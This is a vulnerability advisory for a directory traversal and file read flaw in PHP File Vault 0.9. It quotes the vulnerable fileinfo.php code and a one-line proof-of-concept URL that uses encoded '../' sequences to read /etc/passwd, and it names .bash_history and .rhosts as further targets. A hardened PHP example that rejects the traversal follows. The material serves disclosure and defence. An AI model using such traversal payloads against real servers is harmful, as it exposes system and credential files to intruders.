PHP File Vault 0.9 Directory Traversal / File Read

25 Jul 2016 00:00:00 | Reported by N_A | Type: packetstorm | Source: packetstormsecurity.com

PHP File Vault 0.9 directory traversal and file read vulnerability

Code
`PHP File Vault version 0.9, remote directory traversal and file read vulnerability
==================================================================================  
  
  
Discovered by N_A, N_A[at]tutanota.com  
======================================  
  
  
  
  
Description  
===========  
  
  
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.  
  
https://sourceforge.net/projects/php-file-vault  
  
  
  
Vulnerability  
=============  
  
  
The vulnerability exists within the fileinfo.php file of the package:  
  
  
    if (empty($_GET['sha1'])) die("sha1 is required to get file info");
    $sha1 = trim($_GET['sha1']);
  
  
The 'sha1' variable is read from the GET request and passed to the 'parseFileInfo' function, which calls PHP's fopen() on it:
  
  
  
    function parseFileInfo($fi) {
        $fh = fopen($fi,'r');
        $fname = trim(fgets($fh));
        fclose($fh);
        return array($fname);
    }
  
  
  
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:  
  
    if (!is_readable(FI.$sha1)) die("cannot read file info!");
    list($fname) = parseFileInfo(FI.$sha1);

    readfile('head.html');

    if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
  
  
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.  
  
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.  
  
  
Proof Of Concept  
================  
  
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd  
  
  
  
`
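
A hardened form of the 'sha1' handling in fileinfo.php, as an added example that is not part of the advisory or the project's code. It replaces the bare is_readable(FI.$sha1) check with strict digest validation plus a canonical-path containment test. The helper name resolveFileInfoPath, the temporary directory used for FI, and the sample entry are assumptions made so the block runs on its own.

```php
<?php
// Added example, not the project's code. FI mirrors the constant used in
// fileinfo.php; the temp directory and sample entry below are constructed.
define('FI', sys_get_temp_dir() . '/pfv_demo_fileinfo/');
$digest = sha1('constructed sample upload');
if (!is_dir(FI)) {
    mkdir(FI, 0700, true);
}
file_put_contents(FI . $digest, "example.txt\n");

// Hypothetical helper: return the canonical metadata path for a digest, or
// null when the input is not a SHA-1 hex string or resolves outside FI.
function resolveFileInfoPath(string $input): ?string
{
    $sha1 = trim($input);

    // A SHA-1 digest is exactly 40 hex characters. Anchoring with \A and \z
    // rejects "../", "/", NUL bytes and trailing newlines outright.
    if (!preg_match('/\A[0-9a-f]{40}\z/i', $sha1)) {
        return null;
    }

    // Defence in depth: canonicalise both paths and require the target to
    // stay under FI even if the naming scheme changes later.
    $base = realpath(FI);
    $path = realpath(FI . $sha1);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return (is_file($path) && is_readable($path)) ? $path : null;
}

// Constructed inputs: the advisory's traversal string as PHP sees it after
// URL decoding, and the digest of the sample entry created above.
foreach (['../../../../../../etc/passwd', $digest] as $candidate) {
    $path = resolveFileInfoPath($candidate);
    echo $candidate, ' => ', $path === null ? 'rejected' : $path, PHP_EOL;
}
```

In fileinfo.php the returned path, rather than FI.$sha1, would be the value handed to parseFileInfo().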
